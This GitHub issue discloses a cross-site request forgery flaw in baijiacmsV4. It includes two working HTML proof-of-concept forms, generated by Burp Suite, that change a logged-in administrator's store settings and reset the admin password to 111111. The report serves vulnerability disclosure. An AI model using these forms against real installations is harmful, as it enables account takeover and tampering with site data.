Skip to content
This repository has been archived by the owner on Jul 21, 2022. It is now read-only.

There is a CSRF vulnerability #7

Open
e11usion opened this issue May 17, 2021 · 0 comments
Open

There is a CSRF vulnerability #7

e11usion opened this issue May 17, 2021 · 0 comments

Comments

@e11usion
Copy link

e11usion commented May 17, 2021
edited
Loading

Vulnerability description

A csrf vulnerability was discovered in baijiacmsV4.
There is a CSRF attacks vulnerability.After the administrator logged in, open the following two page,attacker can modify the store information and login password.
1.modify the store information.
poc:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://10.0.0.128/index.php?mod=site&op=post&id=2&act=manager&do=store" method="POST">
      <input type="hidden" name="id" value="2" />
      <input type="hidden" name="sname" value="xxx" />
      <input type="hidden" name="website" value="xxx" />
      <input type="hidden" name="fullwebsite" value="http&#58;&#47;&#47;xxx&#47;" />
      <input type="hidden" name="status" value="1&apos;" />
      <input type="hidden" name="mobile&#95;url" value="http&#58;&#47;&#47;xxx&#47;index&#46;php" />
      <input type="hidden" name="mobile&#95;url" value="http&#58;&#47;&#47;xxx&#47;admin&#46;php" />
      <input type="hidden" name="submit" value="æ&#143;&#144;äº&#164;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

z

Original store information
1
When a logged in administrator opens a malicious web page and clicks the button
2
And the store information has changed
3

2.modify login password.
poc:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://10.0.0.128/index.php?mod=site&op=changepwd&id=1&act=manager&do=user" method="POST">
      <input type="hidden" name="username" value="admin" />
      <input type="hidden" name="newpassword" value="111111" />
      <input type="hidden" name="confirmpassword" value="111111" />
      <input type="hidden" name="submit" value="æ&#143;&#144;äº&#164;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

x

When a logged in administrator opens a malicious web page and clicks the button.
5
And the login password of the administrator will be 111111.
@e11usion e11usion changed the title There is a stored CSRF vulnerability There is a CSRF vulnerability May 17, 2021
@e11usion e11usion reopened this May 25, 2021
Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@e11usion